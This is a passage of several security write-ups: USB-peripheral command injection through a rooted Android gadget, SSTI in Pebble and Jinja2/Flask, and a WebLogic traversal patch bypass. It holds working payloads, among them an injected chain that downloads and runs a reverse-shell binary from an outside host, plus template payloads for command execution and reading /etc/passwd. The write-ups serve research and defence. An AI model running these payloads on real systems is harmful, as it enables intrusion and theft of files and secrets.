So what is functions set to when I just have a developer device plugged in and am using ADB?

bullhead:/sys/class/android_usb/android0 # cat functions
ffs

I happen to know that ADB on the device is implemented using FunctionFS, and ffs looks like shorthand for FunctionFS to me, so it makes sense that that would be enabled. I'm probably going to have to change that value, so let's go ahead and set it to mass_storage and see what happens.

bullhead:/sys/class/android_usb/android0 # echo 0 > enable

And my ADB session dies. Right, you can't just kill USB and expect to keep using a USB connection. Well, at least I know it works! Luckily ADB is nice enough to also work over TCP/IP, so I can restart and:

adb tcpip 5555
adb connect 192.168.1.18:5555

For the record, I wouldn't go doing that on your local coffee shop WiFi. OK, now that we're connected — using the magic of photons — we can bring down USB, change to mass storage, and see what happens.

bullhead:/sys/class/android_usb/android0 # echo 0 > enable
bullhead:/sys/class/android_usb/android0 # echo mass_storage > functions
bullhead:/sys/class/android_usb/android0 # echo 1 > enable

Cool, no errors or crashes or anything. If you're familiar with ConfigFS you'll probably also know that I can modify f_mass_storage/lun/file to give the mass storage device some backing storage. If you're not familiar with ConfigFS, you know that now: nice! If you already know how to make an image to back your USB mass storage device, you're smarter than I was about a week ago and can probably skip the next section.

Making Images

One thing to keep in mind when making the image is that I need to be able to control the disk LABEL value (as seen by blkid). We'll make a file and just use that instead of doing anything fancy.
Note that I didn't actually care about writing things to the USB's disk: I just wanted it to be recognized by the target device as a mass storage device so that it would be mounted. To make our backing image file, then, we'll start off with a whole lot of nothing:

dd if=/dev/zero of=backing.img count=50 bs=1M

This will create a 50MB file named backing.img that is all 0s. That is pretty useless; we're going to need to format it with fdisk. A more adept Linux hacker would probably know how to script this, but I, being an intellectual, did it this way:

echo -e -n 'o\nn\n\n\n\n\nt\nc\nw\n' | fdisk backing.img

That magic is filling out the fdisk entries for you. It looks like this:

Welcome to fdisk (util-linux 2.31.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0xd643eccd.

Command (m for help): Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p):

Using default response p.
Partition number (1-4, default 1):
First sector (2048-20479, default 2048):
Last sector, +sectors or +size{K,M,G,T,P} (2048-20479, default 20479):

Created a new partition 1 of type 'Linux' and of size 9 MiB.

Command (m for help): Selected partition 1
Hex code (type L to list all codes): Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

Command (m for help): The partition table has been altered.
Syncing disks.

We're making an image with a DOS partition table and a single FAT32 partition, with everything else being the default. Cool. We need to do some formatting and labelling now:

# losetup --offset 1048576 -f backing.img /dev/loop0
# mkdosfs -n "HAX" /dev/loop0
# losetup -d /dev/loop0

The magic 1048576 is 2048 * 512, which is the first sector times the sector size.
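The offset arithmetic above is worth sanity-checking; a couple of lines of Python, using the values from the fdisk transcript:

```python
# First usable sector reported by fdisk, and the standard 512-byte sector size.
FIRST_SECTOR = 2048
SECTOR_SIZE = 512

# Byte offset of partition 1 inside backing.img,
# i.e. the value passed to losetup --offset.
offset = FIRST_SECTOR * SECTOR_SIZE
print(offset)  # 1048576
```

The same computation works for any partition start reported by fdisk, so you don't need to hard-code 1048576 if you change the layout.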
Here we just attach our image as the /dev/loop0 device and run a simple mkdosfs: the -n "HAX" is important in my case, as that gives me control over the LABEL. That's all you need to do. Easy.

Bringing it all Together

Armed with our image we can now make the full USB device:

$ adb tcpip 5555
$ adb connect 192.168.1.18:5555
$ adb push backing.img /data/local/tmp/
$ adb shell

And in the adb shell:

$ su
# echo 0 > /sys/class/android_usb/android0/enable
# echo '/data/local/tmp/backing.img' > /sys/class/android_usb/android0/f_mass_storage/lun/file
# echo 'mass_storage' > /sys/class/android_usb/android0/functions
# echo 1 > /sys/class/android_usb/android0/enable

If all goes well:

# lsusb -v -d 18d1:
Bus 003 Device 036: ID 18d1:4ee7 Google Inc.
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x18d1 Google Inc.
  idProduct          0x4ee7
  bcdDevice            3.10
  iManufacturer           1 LGE
  iProduct                2 Nexus 5X
  iSerial                 3 0000000000000000
  bNumConfigurations      1
  Configuration Descriptor:
    bLength                 9
    bDescriptorType         2
    wTotalLength           32
    bNumInterfaces          1
    bConfigurationValue     1
    iConfiguration          0
    bmAttributes         0x80 (Bus Powered)
    MaxPower            500mA
    Interface Descriptor:
      bLength                 9
      bDescriptorType         4
      bInterfaceNumber        0
      bAlternateSetting       0
      bNumEndpoints           2
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk-Only
      iInterface              5 Mass Storage
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x81 EP 1 IN
        bmAttributes            2
          Transfer Type          Bulk
          Synch Type             None
          Usage Type             Data
        wMaxPacketSize     0x0200 1x 512 bytes
        bInterval               0
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x01 EP 1 OUT
        bmAttributes            2
          Transfer Type          Bulk
          Synch Type             None
          Usage Type             Data
        wMaxPacketSize     0x0200 1x 512 bytes
        bInterval               1
  Device Qualifier (for other device speed):
    bLength                10
    bDescriptorType         6
    bcdUSB               2.00
    bDeviceClass            0 (Defined at Interface level)
    bDeviceSubClass         0
    bDeviceProtocol         0
    bMaxPacketSize0        64
    bNumConfigurations      1
  Device Status:     0x0000 (Bus Powered)

You can see the device here:

$ ls -lh /dev/disk/by-id
lrwxrwxrwx 1 root root  9 Aug  2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0 -> ../../sdb
lrwxrwxrwx 1 root root 10 Aug  2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0-part1 -> ../../sdb1

And you should be able to mount:

$ mkdir HAX && sudo mount /dev/sdb1 HAX

I felt like Neo when that worked. Right now this is just a glorified thumb drive, though. The real fun comes with the fact that we can change parameters:

# echo 0 > /sys/class/android_usb/android0/enable
# echo 1337 > /sys/class/android_usb/android0/idProduct
# echo 'Carve Systems' > /sys/class/android_usb/android0/iManufacturer
# echo '1337 Hacking Team' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable

$ lsusb -v -d 18d1:
Bus 003 Device 044: ID 18d1:1337 Google Inc.
Device Descriptor:
....
  idProduct          0x1337
....
  iManufacturer           1 Carve Systems
  iProduct                2 1337 Hacking Team
....

Wow, does that make it easy to make a malicious USB device.

Hacking the Thing

To bring everything full circle, I'll go through the actual exploit that inspired this. The code I was exploiting looked somewhat similar to this:

snprintf(dir, DIR_SIZE, "/mnt/storage/%s%s%s", LABEL, iManufacturer, iProduct);
snprintf(cmd, CMD_SIZE, "mount %s %s", /dev/DEVICE, dir);
system(cmd);

My proof of concept exploit was the following:

  1. Drop a shell script at the vulnerable daemon's cwd that will spawn a reverse shell
  2. Execute that file with sh

One tricky bit is that they were removing whitespace and / from those variables, but luckily system was passing to a shell that understands $IFS and sub-shells.
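The vulnerable pattern is easy to model outside of C. A minimal Python sketch (hypothetical label and manufacturer values, not the device's real code, and ignoring for a moment the whitespace/slash filter described above) shows how attacker-controlled USB properties land inside the shell command:

```python
# Hypothetical device properties read from the USB descriptor / filesystem label.
label = "HAX"
i_manufacturer = ";touch /tmp/haxxed;"  # attacker-controlled, unsanitized
i_product = ""

# Mirrors the two snprintf() calls: properties are concatenated
# into the mount directory, which is concatenated into the command.
mount_dir = "/mnt/storage/%s%s%s" % (label, i_manufacturer, i_product)
cmd = "mount /dev/sdb1 %s" % mount_dir

# The daemon hands this string to system(), so the ';'-delimited
# payload runs as a separate shell command.
print(cmd)  # mount /dev/sdb1 /mnt/storage/HAX;touch /tmp/haxxed;
```

In the real attack the spaces and slashes in the payload are smuggled in via $IFS and sub-shells, since the daemon strips those characters.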
Once I had the Android device set up, exploiting this issue was straightforward; commands would be built as follows:

echo 0 > enable
echo ';{cmd};' > iProduct
echo 1 > enable

With the entire command chain looking like this (I removed some sleep commands that were necessary):

# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}b=`printf$IFS'"'"'\\x2f'"'"'`>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}s=\"$IFS\">>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}u=http:\$b\${b}192.168.1.152:8000\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}curl\$s-s\$s-o\${s}shell\$s\$u>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}chmod\$s+x\${s}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';sh${IFS}a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable

All of those commands together create the following file (/a):

b=/
s=" "
u=http:$b${b}192.168.1.152:8000${b}shell
curl$s-s$s-o${s}shell$s$u
chmod$s+x${s}shell
${b}shell

The last command executes the file with sh a. This script pulls down a binary I wrote to get a reverse shell. You could send your favorite reverse shell payload, but this way is always simple and makes verification quick.
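The repetitive disable/set/enable dance lends itself to a small generator. A sketch (my own helper, not from the original post, with simplified illustrative payload chunks) that emits the same kind of write sequence for each iProduct chunk:

```python
ANDROID0 = "/sys/class/android_usb/android0"

def usb_writes(chunks):
    """Yield the shell commands that replay each payload chunk via iProduct."""
    for chunk in chunks:
        yield "echo 0 > %s/enable" % ANDROID0       # detach the gadget
        yield "echo '%s' > %s/iProduct" % (chunk, ANDROID0)  # set next chunk
        yield "echo 1 > %s/enable" % ANDROID0       # re-attach, triggering a mount

# Two hypothetical chunks: append a line to ./a, then execute it.
cmds = list(usb_writes([";echo${IFS}pwned>>a;", ";sh${IFS}a;"]))
for c in cmds:
    print(c)
```

Each chunk triggers one re-enumeration of the gadget, which is why the real chain also needed sleep commands between writes.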
Upon the last command being executed, we're greeted with the familiar:

$ nc -l -p 3567
id
uid=0(root) gid=0(root) groups=0(root)

Nice.

Takeaways

While it is probably easier to get yourself a Raspberry Pi Zero, it is pretty handy that this can be done so easily through a rooted Android device. As for security takeaways: it is important to remember that ANY external input, even input from physical devices, is not trustworthy, and blacklists can sometimes leave holes that are easy to bypass. There were many ways to avoid this issue, but the most important part of any mitigation would be to not trust properties pulled off of an external device. If you need a unique name, generate a UUID. If you need a unique name that is constant for a given device, verify that the required properties exist and then hash them using SHA-256 or your favorite hashing algorithm. The system C function should also be used sparingly: it is fairly straightforward to mount drives using just C code.

Sursa: https://carvesystems.com/news/command-injection-with-usb-peripherals/
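The mitigation suggested in the takeaways above is straightforward to sketch in Python: derive the mount directory from a UUID, or from a SHA-256 of the device properties when a stable per-device name is needed. The function names and property values here are illustrative only:

```python
import hashlib
import uuid

def random_mount_name():
    # Unique, attacker-independent directory name.
    return uuid.uuid4().hex

def stable_mount_name(label, manufacturer, product):
    # Deterministic per device, but never contains attacker-chosen bytes:
    # only hex digits of a SHA-256 digest reach the filesystem path.
    data = "\x00".join([label, manufacturer, product]).encode()
    return hashlib.sha256(data).hexdigest()

name = stable_mount_name("HAX", "Carve Systems", "1337 Hacking Team")
```

Either way, a hostile iManufacturer string like ";touch /tmp/haxxed;" can no longer influence the command passed to the shell.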
  6. Server Side Template Injection – on the example of Pebble Michał Bentkowski | September 17, 2019 | Research

Server-Side Template Injection isn't exactly a new vulnerability in the world of web applications. It was made famous in 2015 by James Kettle in his well-known post on the PortSwigger blog. In this post, I'll share our journey with another, less popular Java templating engine called Pebble.

Pebble and template injection

According to its official page, Pebble is a Java templating engine inspired by Twig. It features template inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. It supports one of the most common syntaxes in templating engines, in which variable substitution is done with {{ variable }}. More often than not, templating engines make it possible to include arbitrary Java expressions. Imagine that you have a variable called name and you want to put it upper-case in the template; then you can use {{ name.toUpperCase() }}.

The usual way of exploiting template injection in various expression languages in Java is to use code similar to the following:

variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la')

Basically, every object in Java has a method called getClass() which retrieves a special java.lang.Class, from which it is easy to get an instance of an arbitrary Java class. The usual next step is to get an instance of java.lang.Runtime, since it allows executing OS commands. When we came across Pebble for the first time, the code was basically identical to the one shown above.
The only thing that needed to be done was to add mustache tags on both sides:

{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}

Attempts to protect against getting arbitrary classes in Pebble

The author of Pebble added a protection against the attack and blocked invocation of getClass(). Initially, though, there was a funny way to bypass it, because Pebble tried to be smart when looking for methods in expressions. Suppose you have the following expression:

{{ someString.toUPPERCASE() }}

The expression shouldn't work, since the right name of the method is toUpperCase(), not toUPPERCASE(). Pebble, though, ignored casing in method and property names, so with the code above you would actually call the "normal" toUpperCase(). The issue was that when Pebble tried to block access to getClass(), it compared the method name case-sensitively. So you could just use the following statement:

{{ someString.getCLASS().forName(...) }}

and bypass the protection. This issue was fixed in April 2019 in version 3.0.9 by making the comparison case-insensitive.

A few months later, when researching some other Java-related stuff and skimming through the documentation, I noticed that there is another built-in way to get access to an instance of java.lang.Class. A few wrapper classes in Java, like java.lang.Integer, have a field called TYPE whose type is java.lang.Class itself! Hence another way to execute arbitrary code is shown below:

{{ (1).TYPE.forName(...) }}

I reported the issue to Pebble in July 2019, and it was fixed in master using the same approach as in FreeMarker, i.e. a blacklist of method calls. So while I can still do {{ (1).TYPE }}, the forName() method is blocked, making it "impossible" to execute arbitrary code.
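The case-sensitivity flaw generalises beyond Pebble: any deny-list compared case-sensitively while name lookup ignores case is bypassable. A Python sketch of the broken versus fixed check (hypothetical filter code, not Pebble's actual source):

```python
BLOCKED = {"getClass"}

def broken_is_allowed(method_name):
    # Case-sensitive comparison, while method resolution ignores case:
    # "getCLASS" resolves to getClass() but is not in the deny-list.
    return method_name not in BLOCKED

def fixed_is_allowed(method_name):
    # The 3.0.9 approach: compare case-insensitively.
    return method_name.lower() not in {m.lower() for m in BLOCKED}

assert broken_is_allowed("getCLASS")       # bypass succeeds
assert not broken_is_allowed("getClass")   # only the exact spelling is caught
assert not fixed_is_allowed("getCLASS")    # fixed check blocks every casing
```

The general lesson: a filter must canonicalise its input the same way the downstream lookup does before comparing.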
I put the word "impossible" in quotes since I believe that a bypass is still out there to be found, but I was unable to find one. That's an interesting space for further research.

Reading the output of a command (Java 9+)

While it has always been easy to execute an arbitrary command in Java, in the case of vulnerabilities like Server-Side Template Injection it sometimes happens to be difficult to read the output. It was usually done by iterating over the resulting InputStream or by sending the output out-of-band. When researching Pebble, I noticed that things got much easier in Java 9+, since InputStream now has a convenient method readAllBytes which returns a byte array! The byte[] can then be converted to a String with the String constructor. Here's the exploit:

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke(null,null)
     .exec(cmd)
     .inputStream
     .readAllBytes() %}
{{ (1).TYPE
     .forName('java.lang.String')
     .constructors[0]
     .newInstance(([bytes]).toArray()) }}

And the result:

Pebble example exploit

Playing with Pebble

If you wish to play with Pebble, we have prepared a GitHub repo with a Docker container in which you can run various versions of Pebble. You can grab it here: https://github.com/securitum/research/tree/master/r2019_server-side-template-injection-on-the-example-of-pebble. All you need to do is to make sure you have both docker and docker-compose installed and then just run docker-compose up. Then the webserver runs on http://localhost:4567.

Screenshot of Docker application

Summary

Pebble is no different than many other popular templating engines, in which you can execute arbitrary commands if you are allowed to modify the template itself.
The recommendation is to make sure that untrusted users are never able to modify templates.

Author: Michał Bentkowski

Sursa: https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/
  7. RCE with Flask Jinja Template Injection AkShAy KaTkAr | Sep 17 · 4 min read

I got an invite to a private program on Bugcrowd. The program did not have a huge scope: just a single app with lots of features to test. I usually like this kind of program, as I am not that good at recon. My first thought was to find out what technology the website was built with; I use Wappalyzer for that. They were using AngularDart, Python, Django, and Flask. Having been a Python developer for the last few years, I know where developers commonly make mistakes.

There was one utility named workflow builder, which is used to build a financial close process flow. You can automate daily activities with it, like sending approvals and reminder emails. The email-sending functionality caught my attention, because these email generator apps are very often vulnerable to template injection. As the website was built with Python, I was quite sure they must be using a Jinja2 template.

The send email function has 3 fields: to, title, and description. I set {{7*7}} as the title and description and clicked the send email button. I got an email with "49" as the subject and {{7*7}} as the description, so the subject field was vulnerable to template injection.

Payload: {{7*7}}

What the payload {{7*7}} does is evaluate the Python expression inside the curly brackets. I tried another payload to get the list of subclasses of the object class.

Payload: {{ [].__class__.__base__.__subclasses__() }}

I got an email containing the list of subclasses of the object class, like below.

Let me explain this payload. If you are familiar with Python, you may know we can create a list by using "[]". You can try these things in the Python interpreter.

1. Access the class of a list:

>>> [].__class__
<type 'list'> #returns the class of list

2. Access the base class of list:

>>> [].__class__.__base__
<type 'object'> #returns the base class of list

list is a subclass of the "object" class.

3. Access the subclasses of the object class:
>>> [].__class__.__base__.__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>.....

So our payload gives us a list of all subclasses of the "object" class. I reported the issue as it was, hoping I would not have to go further to prove its impact. The Bugcrowd triager replied that I would have to provide a PoC demonstrating the impact of this issue to have it marked as a P1.

Most Django apps have a config file which contains really sensitive info, like AWS keys, API keys, and encryption keys. I had the path of that config file from my previous findings, so I decided to read that file. To read a file in Python you have to create an object of "file", and we already have the list of all subclasses of the object class. Let's find the index of the file class:

>>> [].__class__.__base__.__subclasses__().index(file)
40 #returns the index of the "file" object

When you run "[].__class__.__base__.__subclasses__().index(file)" in the Python interpreter, you get the index of the "file" object. I tried the same payload on the target, but it gave me nothing; something was wrong. I tried to access other objects, but they produced similar errors, not returning any value.

Next, I decided to directly access the file object, since we know its index in the list of "object" subclasses is 40. I tried the payload {{[].__class__.__base__.__subclasses__()[40] }} but got no success; this payload also returned a result similar to the one above. The payload was breaking somewhere, but I was not able to find where. After some research, I came to the conclusion that indexing might be blocked or might be breaking my payload.

If you know a little Python, you may know there are multiple ways to return a value from a list; one of them is the "pop" function:

>>> [1,2,3,4,5].pop(2)
3

The code above returns the third value of the list and removes it from that list.
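Jinja aside, the pop() trick is plain Python list behaviour and easy to verify locally, as is the introspection chain it wraps:

```python
# pop(i) returns the element at index i (and removes it from the list),
# so it can stand in for [] indexing when brackets are filtered.
items = [1, 2, 3, 4, 5]
assert items.pop(2) == 3
assert items == [1, 2, 4, 5]

# The introspection chain from the payload:
# empty list -> its class -> base class (object) -> all loaded subclasses.
subclasses = [].__class__.__base__.__subclasses__()
assert [].__class__ is list
assert [].__class__.__base__ is object
assert len(subclasses) > 0
```

Note that the subclass list and its indices vary between Python versions and even between processes, which is why the author had to look up the index of the file class on a matching interpreter.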
So now my new payload is {{[].__class__.__base__.__subclasses__().pop(40) }}

This payload gives me the object of "file". Now that I have the file object, I can read any file on the server. Let's read the /etc/passwd file.

Payload: {{[].__class__.__base__.__subclasses__().pop(40)('/etc/passwd').read() }}

etc/passwd output in email subject

Finally, I was able to read files on the server. I was also able to read local files on the GCE instance responsible for sending notifications, including some source code and configuration files containing very sensitive values (e.g. API and encryption keys).

Thanks for reading. If you like this article, please share. You are free to ask any questions, just DM me at akshukatkar.

— — Morningstar

Sursa: https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
  8. Patch Analysis: Examining a Missing Dot-Dot in Oracle WebLogic September 17, 2019 | KP Choubey

Earlier this year, an Oracle WebLogic deserialization vulnerability was discovered and released as a 0-day. The bug was severe enough for Oracle to break their normal quarterly patch cadence and release an emergency update. Unfortunately, researchers quickly discovered the patch could be bypassed by attackers. Patches that don't completely resolve a security problem seem to be a bit of a trend, and Oracle is no exception. This blog covers a directory traversal bug that took more than one try to get fully corrected. Oracle initially patched this vulnerability as CVE-2019-2618 in April 2019, but later released a corrected patch in July.

Vulnerability Details

Oracle WebLogic is an application server for building and deploying Java Enterprise Edition (EE) applications. The default installation of the WebLogic server contains various applications to maintain and configure domains and applications. One such application is bea_wls_deployment_internal.war, which contains a feature to upload files. A file can be uploaded by sending an authenticated request to the URI /bea_wls_deployment_internal/DeploymentService. The application calls the handlePlanOrApplicationUpload() method if the value of the wl_request_type header of the request is "app_upload" or "plan_upload". The handlePlanOrApplicationUpload() method validates the value of the wl_upload_application_name header and checks for two variants of directory traversal characters: ../ and /..:

Figure 1 - Directory Traversal Character Checks – With Comments Added

The path <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\ is stored in the variable uploadingDirName. The wl_upload_application_name request header value is used as a subdirectory of this path.
The method shown above appends the user-controlled value wl_upload_application_name to uploadingDirName and passes it via the saveDirectory argument of doUploadFile(). The doUploadFile() function then creates a file in this location using the filename parameter of the request:

Figure 2 - The doUploadFile() Function

The wl_upload_application_name and filename fields were vulnerable to directory traversal. In April 2019, Oracle tried to patch the directory traversal as CVE-2019-2618. The patch for CVE-2019-2618 added checks for two more variants of directory traversal characters in the wl_upload_application_name field: \.. and ..\:

Figure 3 - Code Changes from CVE-2019-2618

For the filename field, CVE-2019-2618 added a check to doUploadFile() to ensure the final path where the file is saved contains the proper save directory, as indicated by the variable saveDir. The value of saveDir is <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\[UPLOAD_APP], where the value of [UPLOAD_APP] comes from wl_upload_application_name. The patched doUploadFile() method throws an error if the filename variable contains directory traversal characters and does not contain the string represented by saveDir:

Figure 4 - Exception Error for saveDir

This validation of the filename field is mostly sufficient. As a side note, though, it would have been better if they had used startsWith instead of contains. The way the patch is written, the validation can theoretically be bypassed if anywhere within the final path there is a substring resembling the legitimate save path. There is no direct route to exploitation, though: the doUploadFile() function will not automatically create a directory structure if the one specified by saveTo doesn't exist.
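The weakness of a contains-style check can be sketched in a few lines of Python, with the `in` operator standing in for Java's String.contains and str.startswith for startsWith. The paths here are illustrative, not WebLogic's real layout:

```python
SAVE_DIR = r"C:\Oracle\upload\myapp"

def contains_check(final_path):
    # Analogue of the patched Java check: passes if SAVE_DIR appears anywhere.
    return SAVE_DIR in final_path

def startswith_check(final_path):
    # The stricter alternative: the path must begin with the save directory.
    return final_path.startswith(SAVE_DIR)

# A legitimate upload path satisfies both checks.
good = SAVE_DIR + r"\poc.jsp"
assert contains_check(good) and startswith_check(good)

# A contrived path that merely embeds the save dir as a substring
# satisfies contains() but not startsWith().
evil = r"C:\attacker\C:\Oracle\upload\myapp\poc.jsp"
assert contains_check(evil)
assert not startswith_check(evil)
```

As the post notes, exploiting this particular gap would require a separate primitive to create such a directory structure, so it is a theoretical weakness rather than a practical bypass.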
So, for a bypass of the above patch to be relevant, an attacker would need some other technique that is powerful enough to enable creation of arbitrary directory structures within a sensitive location on the server, yet fails to offer a file upload capability of its own. On the whole, this is an unlikely scenario.

However, with regard to the wl_upload_application_name header field, the CVE-2019-2618 patch is inadequate and can be bypassed by setting the value of the wl_upload_application_name header to .. (dot-dot). This allows uploading to any subdirectory of the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer directory. Note the absence of the final path component, which should be "upload". This is a sufficient condition to achieve code execution by writing a JSP file within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp\ directory. An example of a POST request to write a file poc.jsp to a location within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp directory is as follows:

Figure 5 - Demonstrating the Directory Traversal

A file written to the \_WL_internal\bea_wls_internal subdirectory of the tmp directory can be accessed without authentication. For the aforementioned example, the attacker can execute JSP code by sending a request to the URI /bea_wls_internal/poc.jsp.

The patch for CVE-2019-2827 released in July fixed the directory traversal vulnerability correctly by validating the wl_upload_application_name header field for .. (dot-dot) directory traversal characters as follows:

Figure 6 - Code Changes for CVE-2019-2827

Conclusion

Variations of directory traversal bugs have existed for some time, but continue to affect multiple types of software. Developers should ensure they are filtering or sanitizing user input prior to using it in file operations. Over the years, attackers have used various encoding tricks to get around traversal defenses.
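One such encoding trick is easy to demonstrate with Python's standard library: a filter that inspects the raw string before percent-decoding misses the traversal sequence entirely.

```python
from urllib.parse import unquote

raw = "%2e%2e%2fetc%2fpasswd"

def naive_filter(value):
    # Checks the still-encoded value, so it finds nothing suspicious.
    return "../" not in value

assert naive_filter(raw)            # the filter is fooled
decoded = unquote(raw)
assert decoded == "../etc/passwd"   # but the decoded path traverses
```

The safe order of operations is to decode (and canonicalise) first, then validate the result.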
For example, using URI encoding, "%2e%2e%2f" translates to "../" and could evade some filters. Never underestimate the creativity of those looking to exploit your systems. While this blog covers a failed patch from Oracle, multiple vendors have similar problems. Patch analysis is a great way to probe for things that may have been missed by the developers, and a great way to find related bugs is to examine the patched components.

You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches.

Sursa: https://www.zerodayinitiative.com/blog/2019/9/16/patch-analysis-examining-a-missing-dot-dot-in-oracle-weblogic
  9. Explaining Server Side Template Injections Web Hacking chivato

Hey, I am chivato, this is my first post on here and I hope it is of some use to people. Exploiting SSTI in strange cases will be the next post I make. Any and all feedback is appreciated <3.

Building the environment:

We start with just a basic Flask web application, written in Python (I will be using Python 2), which is as follows:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    return "Hello, World!"

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

This website will just return "Hello, World!" when visited. Now, we need to add parameters so we can interact with the web application. This can be done with Flask's request object, so we just add request.args.get('parameter name'). In my case the parameter will be called "name"; here is how our code should look:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

But since this always returns the value in the get request, if you go to the website without a get parameter called name, you will get an error. To fix this I included a simple if statement:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    if output:
        pass
    else:
        output = "Empty"
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

Perfect, now we have a Flask app that returns the value in the get parameter and doesn't crash. Now to implement the vulnerability. The vulnerability arises when templates are executed on the side of the server and we control what the template contains. For example, a vulnerability was found in Uber by the famous bug hunter known as orange; it consisted of making your profile name follow the template syntax for Jinja2 (which is {{template content}} for Jinja2),
and then when you received the email, the template had been executed. So, imagine you set {{'7'*7}} as your username; when you receive the email, you will see "Welcome 7777777."

As stated above, the vulnerability comes into play when the template is executed on the side of the server and we control the input, so let's make sure our input is rendered. This can be done with render_template_string from Flask, which takes a string and treats it as text that may contain templates; if it does, it executes them.

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    if output:
        output = render_template_string(output)
    else:
        output = "Sp0re<3"
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

As you can see, now, if you visit "http://localhost:1337/?name={{'7'*7}}", you will be welcomed with "7777777". We now have our environment set up and ready to play with (later on I will be looking at some simple WAF bypass methods, but for now we are leaving our script as is).

Recognising and exploiting the vulnerability:

Template engines are used VERY widely nowadays, and they exist for a variety of different languages, such as PHP, JS, Python (obviously), Ruby, and many more. The base of why they are useful is when you have a large website or platform where not many details change between pages. For example, Netflix has the same layout for its content, and the only things that change are the title, description, banner, and some other minor details; so instead of creating a whole page per show, they just feed the data to their templates, and the engine puts it all together. Template engines can be used for anything that follows that process of having to use the same thing tons of times, so in Uber's example, instead of making a new email every time, they had a single email template and just filled in the name each time.
So, knowing that we can execute templates, what can we actually do with that? Well, honestly, a lot.

> Read the configuration. This can be used to grab the SECRET_KEY, which is used to sign cookies; with this, you can create and sign your own cookies. Example payload for Jinja2:

{{ config }}

> Read local files (LFR). This can be used to do a variety of things, ranging from directly reading a flag if it is held in the templates folder with a basic {% include 'flag.txt' %}, to reading any file on the system, either via the RCE payload (see next point) or via an alternative. An example alternative payload would be:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} //Index may vary depending on version.

> Remote command execution (RCE). Finally, the remote command execution payload. Obviously the most severe and dangerous one, and it can be done a variety of ways; one is going through the subclasses and finding the subprocess.Popen index:

{{''.__class__.mro()[1].__subclasses__()[ HERE IS WHERE THE NUMBER WOULD GO ]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

Although I have had much more success with the following payload, which uses Popen without guessing the offset:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("whoami").read().zfill(417)}}{%endif%}{% endfor %}

You may need to go to the end of the page to skip all the 0's that are produced by that payload.

Now that some of the basic exploits are covered, we can take a look at bypass methods. Let's start with the parameter bypass method. Imagine you have a template engine, in this case Flask's, that takes a value from a parameter and removes any "_" from it. This would restrict us from doing a variety of things, for example {{ __class__ }}. So, this bypass method is based off of the idea that only that parameter gets checked for the underscores.
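To see why those hard-coded subclass indices ([40], etc.) are so fragile, the object-graph traversal the payloads perform can be reproduced in plain Python (no Jinja2 needed). The position of a given class in __subclasses__() shifts between interpreter versions, which is exactly why the {% for %} payload above searches by name instead:

```python
import warnings  # ensure warnings.catch_warnings is loaded, as in a typical app

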